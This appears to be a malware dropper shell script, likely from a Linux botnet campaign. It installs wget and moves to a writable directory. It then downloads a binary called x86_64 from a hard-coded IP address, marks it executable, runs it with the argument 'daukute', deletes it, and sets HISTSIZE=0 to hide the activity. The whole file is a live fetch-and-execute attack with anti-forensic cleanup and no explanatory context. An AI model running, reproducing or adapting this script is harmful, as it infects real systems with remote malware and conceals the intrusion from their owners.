#!/usr/bin/bash
apt install wget -y
yum install wget -y
cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && wget http://103.183.118.73/x86_64 && chmod 777 x86_64 && ./x86_64 daukute && rm -rf x86_64 && cd /root/ && clear && HISTSIZE=0 && exit

